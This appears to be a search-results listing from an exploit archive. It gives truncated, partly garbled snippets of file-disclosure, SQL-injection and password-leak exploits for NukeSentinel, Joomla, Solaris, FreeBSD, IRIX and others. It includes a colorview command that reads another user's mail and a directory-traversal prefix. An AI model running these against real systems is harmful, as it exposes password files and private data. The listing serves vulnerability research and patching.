69 matches found
NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
No description provided by source. !/usr/bin/php File Disclosure Maybe work on other versions. Interesting exploit = if$argc URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------ Usage: $argv0 -url -file Options Example: $argv0 -url...
Cahier de texte V2.0 SQL Code Execution Exploit
!/usr/bin/perl INFORMATIONS ============ Affected.scr..: Cahier de texte V2.0 Poc.ID........: 15061124 Type..........: Predictable backup filename, Source disclosure Risk.level....: High Conditions....: registerglobals = on Src.download..: www.etab.ac-caen.fr/bsauveur/cahierdetexte/ Poc.link........
Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit
No description provided by source. / $Id: raptorsysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $ raptorsysinfo.c - Solaris sysinfo2 kernel memory leak Copyright c 2006 Marco Ivaldi [email protected] systeminfo.c for Sun Solaris allows local users to read kernel memory via a 0 variable count...
MyBloggie 2.1.4 - trackback.php Multiple SQL Injections
MyBloggie 2.1.4 - trackback.php Multiple SQL Injections !/usr/bin/php -q -d shortopentag=on = 4.1 allowing subs / if $argctrackbackreply1, "Sorry, Trackback failed.. Reason : No title"; if!empty$REQUEST'url' $url=urldecode$REQUEST'url'; if validateurl$url==false $tback-trackbackreply1, "Sorry,...
Joomla! 1.0.9 - Weblinks Blind SQL Injection
Joomla! 1.0.9 - Weblinks Blind SQL Injection !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$stri...
FreeBSD (4.x < 5.4) master.passwd Disclosure Exploit
No description provided by source. / FreeBSD master.passwd disclosure exploit by kcope in 2005, kingcopeatgmx.net thanks to revoguard just compile and execute .. look into the kmem file it contains the master.passwd tested on unpatched FreeBSD 4.11-RELEASE advisory:...
iPool 1.6.81 - Local Password Disclosure
iPool 1.6.81 - Local Password Disclosure / iPool include include HKEY hKey; define BUFSIZE 100 char prgfilesBUFSIZE; DWORD dwBufLen=BUFSIZE; LONG lRet; int main ifRegOpenKeyExHKEYLOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion", 0, KEYQUERYVALUE, &hKey == ERRORSUCCESS lRet =...
Roundup 0.50.6 - Remote File Disclosure
Roundup 0.50.6 - Remote File Disclosure source: https://www.securityfocus.com/bid/10495/info Roundup is prone to a remote file disclosure vulnerability. A remote user can disclose files on a vulnerable computer by using the /home/@@file/ prefix and '../' directory traversal sequences. This...
SGI IRIX 6.0.1 - 'colorview' Read Files
source: https://www.securityfocus.com/bid/336/info Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. /usr/sbin/colorview -text /var/spool/mail/admin...